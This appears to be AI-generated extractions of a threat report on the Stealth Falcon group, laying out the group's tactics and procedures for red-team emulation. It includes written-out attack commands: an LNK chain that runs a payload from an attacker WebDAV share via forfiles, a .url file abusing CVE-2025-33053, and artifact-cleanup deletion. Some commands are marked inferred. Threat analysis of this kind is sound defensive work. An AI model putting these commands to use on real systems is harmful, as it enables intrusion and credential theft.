• Procedure: Horus Agent uses API Hashing to dynamically resolve API functions.

• Note: A structure for required functions is created, assigning hash values, and then resolving at once.

• Technique: Command Execution (Horus Agent)

• Commands:

  • jobs: Send a text visualization of all running jobs.
  • survey: Collect more information on the system.
  • config: Update config values.
  • exit: Exit the program.
  • ls: List files / folder under a directory.
  • shinjectchunked: Receive shellcode in chunks from the C2, then inject it into a remote process or into the current process, based on the “stealth” parameter sent with the shellcode.
  • shinjectstealth: Inject shellcode into the current process
  • upload: Download a file from the C2 server.
  • jobkill: Forces Kill a job.

• Technique: Custom enumeration

• Procedure: Uses the WMI query SELECT * FROM Win32_Service WHERE State='Running' with the ROOT\CIMV2 namespace to collect information about running services and save the fields DisplayName and ServiceName.
• Procedure: uses the function GetSystemPowerStatus and then parses the returned SYSTEM POWER STATUS structure.
• Procedure: retrieves the %USERPROFILE% path and extracts the username.
• Procedure: Windows APIs to collect process ID, architecture, name, running user, path and the parent process ID.

• Procedure: queries ROOT\CIMV2 namespace using FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = 'True', and parses the data which details the network settings of a system, such as hostname, IP addresses, DHCP and DNS settings, gateway, and network adapters information.

• Technique: Remote Injection of the shellcode (shinjectchuncked)

  • Procedure: Can inject the code by either of the following, stealth is an input parameter:
    • (Classic) OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
    • (Stealth) Find security vendors -> If not found, allocate in the current process, copy the shellcode, then creates a thread.

Phase: Post-Compromise and Credential Access

• Technique: DC Credential Dumping via VHD
  • Procedure: Creates a virtual hard disk (VHD) copy of the system's disk at C:\ProgramData\ds_notifier_0.vhdx.
  • Procedure: Uses the VHD copy to extract NTDS.dit, SAM, and SYSTEM files.
  • Procedure: Compresses the extracted files using Gzip.
  • Procedure: Collects the output into the archive C:\ProgramData\ds_notifier_2.vif.

Phase: Lateral Movement and Persistence

• Technique: Passive Backdoor Deployment

  • Procedure: Deploys usrprofscc.exe as a service.
  • Procedure: Installs the service via command-line arguments
  • Command: usrprofscc.exe install

• Technique: Passive Backdoor Execution

  • Procedure: Listens for incoming requests on a socket.
  • Procedure: Decrypts and validates incoming requests using AES.
  • Procedure: Executes shellcode payloads received in requests in a newly created thread.

Phase: Additional Information Gathering (Keylogger)

• Technique: Keylogging
  • Procedure: Keylogger DLL (StatusReport.dll) is injected into a process.
  • Procedure: Keylogger captures keystrokes and writes them to an encrypted file in C:\windows\temp.

Phase: Alternate Initial Access

• Technique: Spear-phishing with LNK file executing LOLBins and WebDAV.
  • Command: cmd /c DeviceCredentialDeployment & cmd /V:ON /C "set EDITOR=chttpim& pushd \\<WebDAV>&start /B <lure>&timeout 8&@for^files /p c:\windows /m notepad.exe /c \\<WebDAV>\Suppliero.8bps&popd"
  • Procedure: Execute DeviceCredentialDeployment.exe, pushd to the webdav server, executes a URL and executes code through forfiles.

Notes:

• This extraction focuses on the procedures.
• The report relies heavily on custom tooling, making direct command replication limited without access to those custom tools.
• LOLBins abuse is a recurring theme in this threat actor's tactics.
• The exact infection chain with CPL is missing.

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the tactics, techniques, and procedures used by the Stealth Falcon threat group, suitable for red team emulation:

Phase: Initial Access

• Technique: Spear-phishing with Malicious .url File
• Procedure: The attacker sends spear-phishing emails containing a malicious .url file (e.g., TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url). This file is crafted to launch legitimate Windows utilities with a manipulated working directory pointing to an attacker-controlled WebDAV server.
• Technique: Spear-phishing with Malicious .lnk File
• Procedure: The attacker sends spear-phishing emails containing a ZIP archive (e.g., Supplier prequalification application form.zip) which contains a malicious .lnk file (e.g., Supplier.lnk).

Phase: Execution

• Technique: Zero-Day Exploitation (CVE-2025-33053) via Search Order Hijacking
• Procedure: A malicious .url file sets the WorkingDirectory to an attacker-controlled WebDAV server. When iediagcmd.exe is launched by the .url file, it attempts to load auxiliary executables (e.g., route.exe) from its current working directory first. This causes iediagcmd.exe to execute a malicious route.exe from the WebDAV share instead of the legitimate system executable.
• Command (illustrative, .url file content): [InternetShortcut] URL=C:\Program Files\Internet Explorer\iediagcmd.exe WorkingDirectory=\\<WebDAV_Server_URL>\OSYxaOjr ShowCommand=7
• Procedure: Similar to above, CustomShellHost.exe is launched, and due to search order hijacking, it executes a malicious explorer.exe from the controlled WebDAV share.
• Technique: Obfuscated LOLBin Execution (DeviceCredentialDeployment.exe)
• Procedure: The .lnk file executes cmd.exe which then launches DeviceCredentialDeployment.exe to hide the command window and proceed with the infection chain.
• Command: C:\Windows\system32\cmd.exe /c DeviceCredentialDep^loyment & cmd /V:ON /C "set EDITOR=chttpim& pushd <WebDAV_URL>\eQwcvcZIy&start /B <Decoy_PDF_URL>&timeout 8&@for^files /p c:\windows /m notepad.exe /c \"cmd /c <WebDAV_URL>\eQwcvcZIy\Suppliero.8bps\"&popd"
• Technique: Execution via Forfiles LOLBin
• Procedure: The forfiles utility is used to execute a staged payload from the WebDAV server. forfiles is configured to search for a common executable (e.g., notepad.exe) and upon finding it, executes a specified command.
• Command (executed by forfiles): cmd /c <WebDAV_URL>\eQwcvcZIy\Suppliero.8bps
• Technique: Multi-Stage Shellcode Execution
• Procedure: Injected shellcode decrypts subsequent stages using a homebrew block cipher. This often involves preloading specific DLLs (shell32.dll), decompressing payload DLLs, and manually mapping them into memory for execution of a specific export (e.g., _1).
• Technique: In-Memory Payload Loading
• Procedure: Loaders retrieve and execute final payloads (e.g., Horus Agent, Apollo Agent) directly in memory, often after decryption and anti-analysis checks. This includes .NET-based loaders for Apollo.

Phase: Persistence

• Technique: Programmatic Service Creation
• Procedure: The passive backdoor (usrprofscc.exe) is installed as a Windows service using programmatic API calls (CreateServiceA, ChangeServiceConfig2A), not command-line sc.exe.
• Service Parameters:
  • Service Name: UsrProfSCC
  • Display Name: User Profile Service Check
  • Description: This service checks for the service that supports user profile updating.
• Procedure: The passive backdoor can also be programmatically uninstalled.

Phase: Privilege Escalation

• Technique: Admin Privilege Requirement
• Procedure: The passive backdoor (usrprofscc.exe) requires administrator permissions to install as a service, implying a prior or concurrent privilege escalation step if not already running with elevated privileges.

Phase: Defense Evasion

• Technique: Process Hollowing / Remote Process Injection
• Procedure: The loader creates a suspended legitimate process (e.g., msedge.exe, WWAHost.exe, UserAccessBroker.exe, dxdiag.exe), allocates memory, writes the payload into it, and then manipulates the main thread's execution context to run the injected code.
• API Calls (example from report): ZwAllocateVirtualMemory, ZwWriteVirtualMemory, NtProtectVirtualMemory, GetThreadContext, SetThreadContext, NtResumeThread, CloseHandle.
• Technique: Code Obfuscation & Anti-Analysis
• Procedure: Payloads (e.g., route.exe loader, Horus Agent, Apollo Agent) are protected using commercial tools like Code Virtualizer and ConfuserEx, and custom OLLVM, involving control flow flattening and string encryption.
• Procedure: Manual DLL mapping (kernel32.dll, ntdll.dll) is used to hinder analysis and debugging.
• Procedure: Dead code insertion and API call obfuscation (including unused imports) are used to confuse static analysis engines.
• Procedure: Strings are encrypted using a simple shift cipher (subtracting 39 from each character) or XOR.
• Procedure: API hashing is used to dynamically resolve Windows API functions.
• Technique: Anti-Virus Evasion (Vendor-Specific)
• Procedure: The loader scans running processes for known security solution executables (e.g., Kaspersky, Avast, AVG, Symantec, Sophos products). Depending on flags, execution may be halted or a different injection method chosen if a specific AV is detected.
• Technique: Decoy Document
• Procedure: A decrypted PDF document is dropped to disk and opened to distract the victim while the malicious payload executes in the background.
• Command (inferred): cmd.exe /c start %TEMP%\TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf
• Technique: File Deletion (Artifact Cleanup)
• Procedure: The malware attempts to clean up its tracks by deleting the Windows WebDAV cache.
• Command (inferred): del /q %WINDIR%\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\*
• Technique: Mutex for Singleton Control
• Procedure: The backdoor creates a mutex based on its UUID to ensure only one instance is running.
• Technique: Token Manipulation
• Procedure: The keylogger loader impersonates explorer.exe by grabbing and duplicating its token before launching processes.
• API Calls: OpenProcess, DuplicateTokenEx, CreateProcessAsUserA.
• Technique: Environment Variable Manipulation
• Command: set EDITOR=chttpim (used in the LNK file chain, value likely used by a subsequent script)

Phase: Discovery

• Technique: System Information Discovery
• Procedure: The Horus Agent collects initial information (OS, username, hostname, domain, PID, architecture) during check-in.
• Procedure: The survey command collects system information including battery status (GetSystemPowerStatus), user profile details (%USERPROFILE%), and network configuration.
• Technique: Process Discovery
• Procedure: The survey command collects details about running processes (PID, architecture, name, running user, path, parent PID) using Windows APIs.
• Technique: System Service Discovery (WMI)
• Procedure: The survey command uses WMI to query running services.
• Command (illustrative): wmic path Win32_Service where "State='Running'" get DisplayName,ServiceName /format:list
• Technique: Network Configuration Discovery (WMI)
• Procedure: The survey command uses WMI to query network adapter configurations.
• Command (illustrative): wmic path Win32_NetworkAdapterConfiguration where "IPEnabled='True'" get Hostname,IPAddress,DHCPEnabled,DNSHostName,Gateway /format:list
• Technique: File and Directory Discovery
• Command: ls [path] (Horus/Apollo agent command)

Phase: Credential Access

• Technique: OS Credential Dumping (Offline)
• Tool: DC Credential Dumper
• Procedure: The tool accesses a virtual hard disk (VHD) copy of the system's disk to bypass file locks and directly read and extract credential-related files.
• Targeted Files: Windows\NTDS\NTDS.dit, Windows\System32\Config\SAM, Windows\System32\Config\SYSTEM.

Phase: Collection

• Technique: Data Compression
• Procedure: Dumped credential files are compressed using Gzip.
• Technique: Data Staging
• Procedure: The DC Credential Dumper bundles collected files into a single compressed ZIP archive (e.g., C:\ProgramData\ds_notifier_2.vif).
• Procedure: The keylogger writes logged keystrokes to a file (e.g., C:\Windows\Temp\~TN%LogName%.tmp).
• Technique: Input Capture (Keylogging)
• Tool: Custom Keylogger (StatusReport.dll)
• Procedure: The keylogger continuously captures keystrokes.
• Technique: Data Encryption
• Procedure: Logged keystrokes are encrypted using RC4 before being written to disk.

Phase: Command and Control

• Technique: Custom HTTP/S Communication
• Procedure: The Horus/Apollo agent communicates with the C2 server using GET (for check-in and task polling) and POST (for sending responses) requests.
• Procedure: C2 configuration is stored in the implant and decrypted using RC4.
• Procedure: Communication packets are structured (UUID + IV + encrypted data + HMAC-SHA256 checksum) and base64-encoded.
• Technique: File Download
• Command: upload <file_data> <path_to_save> (Horus agent command for downloading from C2)
• Technique: Listener (Passive Backdoor)
• Tool: Passive Backdoor (usrprofscc.exe)
• Procedure: The backdoor creates a socket to listen for incoming requests and execute received shellcode payloads.
• Technique: Inter-Process Communication (for Shellcode Output)
• Procedure: The passive backdoor can create a named pipe with a random name to send back results of executed shellcode.

Phase: Impact

• Technique: Process Termination
• Command: jobkill <job_id> (Horus/Apollo agent command)
• Procedure: The loader has an internal, but currently buggy, capability to terminate previous stage processes (e.g., iediagcmd.exe).